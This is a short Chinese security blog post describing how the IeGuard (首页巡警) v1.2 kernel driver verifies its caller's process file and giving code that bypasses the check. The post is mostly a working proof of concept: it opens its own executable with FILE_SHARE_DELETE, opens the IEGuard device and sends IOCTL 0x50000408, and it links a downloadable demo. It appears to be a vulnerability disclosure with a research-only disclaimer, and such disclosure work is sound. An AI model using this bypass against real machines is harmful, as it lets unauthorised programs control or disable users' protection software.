作者:MJ0011
来源:MJ0011的内核驱动研究所
首页巡警v1.2版加入了一个校验,在发送IRP_MJ_CREATE请求到其驱动时,会打开当前进程的 SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行 校验,若不是IeGuard的话,就拒绝操作其驱动
不过,同样非常轻易可以绕过
代码如下:
GetModuleFileName(0 , filename , MAX_PATH);
CreateFile( filename ,
FILE_READ_DATA ,
FILE_SHARE_DELETE,
0,
OPEN_EXISTING ,
0,
0);
HANDLE hdev = CreateFile(“////.//IEGuard” ,
FILE_READ_ATTRIBUTES ,
0 ,
0,
OPEN_EXISTING ,
0 ,
0
);
DeviceIoControl(hdev ,
0x50000408 ,
0 , 0 , 0 , 0 , &retlen , 0 );
测试程序下载:
漏洞演示下BypassIeGuard12.rar
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论